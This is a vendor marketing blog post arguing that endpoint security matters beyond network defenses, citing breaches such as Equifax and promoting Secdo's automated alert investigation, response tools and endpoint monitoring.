Security teams have spent the better part of the last decade deploying the best network security solutions which have proven to be, for the most part, reliable. We then make sure these technologies are tested, configured appropriately, and maintained as well as we can within our budget while understanding the risks associated with certain decisions, and the rewards for others.
What most fail to realize is that the target of these attacks isn’t the network. In reality, the network is just a strong outside gate that can be climbed or burrowed under, and in some cases broken through, but the real target is inside the house—the fine china, the silverware, the cash in the cookie jar—or in business, the endpoint and the confidential data it stores.
'New' Attacks Are Getting us into Trouble
With all of the time spent in managing our network security, what time have we really dedicated to improving what happens when they’re circumvented? Endpoint based defenses are largely prevention based, using firewall, IPS/IDS, NAC, AV, etc. to stop roughly between 90%-97% of attempts to gain entry. So then isn’t it the 3%-10% difference that becomes the most important? How do we detect and protect against the threats that are unknown to the industry, the technology, and its users?
These are important questions to ask. They are important because the ‘new’ attacks are the ones getting us in trouble (think, for example, the Apache Struts attack that was to blame for the Equifax breach). A ‘new’ unpatched vulnerability coupled with other variables, lead to potentially affecting 143 million U.S. Consumers. This is an endpoint problem on many levels.
Three to ten percent may be a small number, but the Equifax, Anthem, Yahoo! and not to forget, Target, breaches of the world would tell you that number is not small enough to overlook. In fact, this percentage of unknown exploits, vulnerabilities, and threat vectors are the most important blind spot that security teams need to address.
There are solutions dedicated to closing these blind spots that are unique in every network, focused on detecting the unknown through attack behaviors and empower security teams to manage, react and adapt to the changing threat landscape. The problem is that we have all bought into the ‘fence and alarm’ approach rather than looking into deeper levels of security and enabling the needs of the security practitioners. We need to outfit ourselves with the right security tools to prevent analog and digital burglars from taking anything that belongs to us.
What can be done today?
Secdo was architected to provide a deeper level of security, creating an adaptive security model by closing the gaps in defenses and addressing the day-to-day struggles of operations. How?
Reduce the burden:
Security teams are inundated with 100’s of alerts per day from network security alerting tools like SIEM, firewall, etc. Because of the time required to assess each alert only a small percentage can be reviewed per day. Secdo augments these tools by automatically investigating and re-prioritizing every security alert, providing analysts with a complete picture of the attack including timeline, root cause, scope, reputation and other information in seconds rather than hours – multiplying the number of alerts handled by 10-100x per day.
Respond and Adapt:
Armed with this forensic detail, security teams can take action with over 50 surgical and enterprise wide response tools, ensuring any external or insider threat can be neutralized. Secdo will also learn from the threat, uniquely utilizing the attack behaviors discovered to continually optimize the AI engine and automate the defense against future similar threats.
Close the Gaps:
Understanding that blind spots are instrumental to the security of any enterprise, Secdo monitors endpoints at the thread level, recording every activity for over 100 days and forming the basis of both the automated investigations and hunting for unknown threats. Unknown threats can be discovered based on attack methodology as opposed to signatures allowing a quick but advanced method of threat hunting that doesn’t fall victim to traditional approaches. Once an open attack vector is found by the security team, Secdo can automatically investigate the threat and hunt for the same activity, preventing future threats and constantly reducing the attack surface area.
So yes, your gates and alarms are a great start, but with Secdo you have the equivalent of 24/7 surveillance camera, traps, and automated defenses that could be used to protect your network and data—or your collection of 1980s GI Joe figurines and Weird Al records. Because that’s worth something, somewhere … right?